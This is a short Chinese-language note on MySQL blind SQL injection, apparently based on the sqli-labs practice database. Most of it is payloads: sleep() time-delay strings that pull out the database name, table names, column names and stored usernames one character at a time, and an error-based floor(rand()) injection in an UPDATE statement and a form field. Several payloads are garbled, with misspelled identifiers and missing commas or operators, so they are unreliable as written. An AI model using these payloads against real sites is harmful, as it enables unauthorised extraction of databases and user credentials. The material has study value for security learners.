时间盲注

sleep注入

获取库名

and sleep(if(ascii(substr(database(),1,1))<116,0,5)) %23
and sleep(if(ascii(substr(database(),1,1))<115,0,5)) %23
如果116立即执行 115延迟5秒 证明ascii为115 对照得数据库首位为s 以此类推得出数据库名

获取表名

and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1)1,1))<102,0,5)) %23
and sleep(if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1)1,1))<101,0,5)) %23
102立即执行 101延迟五秒 limit0,1可以更换 查询其他的表

获取字段名

and sleep(if(ascii(substr((select column_name from information_schema.colimns where table_name='users' and table_schemn='security' limit 0,1)1,1))<106,0,5)) %23
and sleep(if(ascii(substr((select column_name from information_schema.colimns where table_name='users' and table_schemn='security' limit 0,1)1,1))<105,0,5)) %23
根据延时可以得到第一个字段的第一个字母 更换limit后面参数 以此类推 得到第一个字段名 以及其他字段名

获取表里面的值

and sleep(if(ascii(substring((select username from security.users limit 0,1)1,1))<69,0,5)) %23
and sleep(if(ascii(substring((select username from security.users limit 0,1)1,1))<68,0,5)) %23
得到ascii值为68 以此类推 得到该用户名

if(payload,sleep(3),1)
payload正确时 程序暂停3秒 否则立刻执行
if(payload,1,sleep(3))
payload正确时 程序立刻执行 否则暂停3秒

1.PNG

MySQL原句

update user set password = 'admin' where password = (select 1 from (select count(),(concat("_{",database(),"}",floor(rand()2))) name from information_schema.tables group by name)b);

表单中

and (select 1 from (select count(),(concat("_{",database(),"}",floor(rand()2))) name from information_schema.tables group by name)b) #&submit=submit